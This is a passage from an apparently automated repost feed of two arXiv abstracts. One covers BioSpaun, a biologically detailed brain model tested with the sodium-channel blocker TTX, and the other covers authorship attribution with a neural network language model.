We describe a large-scale functional brain model that includes detailed, conductance-based, compartmental models of individual neurons. We call the model BioSpaun, to indicate the increased biological plausibility of these neurons, and because it is a direct extension of the Spaun model \cite{Eliasmith2012b}. We demonstrate that including these detailed compartmental models does not adversely affect performance across a variety of tasks, including digit recognition, serial working memory, and counting. We then explore the effects of applying TTX, a sodium channel blocking drug, to the model. We characterize the behavioral changes that result from this molecular level intervention. We believe this is the first demonstration of a large-scale brain model that clearly links low-level molecular interventions and high-level behavior.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1orLimc
via IFTTT

Authorship Attribution Using a Neural Network Language Model. (arXiv:1602.05292v1 [cs.CL])

In practice, training language models for individual authors is often expensive because of limited data resources. In such cases, Neural Network Language Models (NNLMs), generally outperform the traditional non-parametric N-gram models. Here we investigate the performance of a feed-forward NNLM on an authorship attribution problem, with moderate author set size and relatively limited data. We also consider how the text topics impact performance. Compared with a well-constructed N-gram baseline method with Kneser-Ney smoothing, the proposed method achieves nearly 2:5% reduction in perplexity and increases author classification accuracy by 3:43% on average, given as few as 5 test sentences. The performance is very competitive with the state of the art in terms of accuracy and demand on test data. The source code, preprocessed datasets, a detailed description of the methodology and results are available at http://ift.tt/1mICOp3.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1Oh5oUR
via IFTTT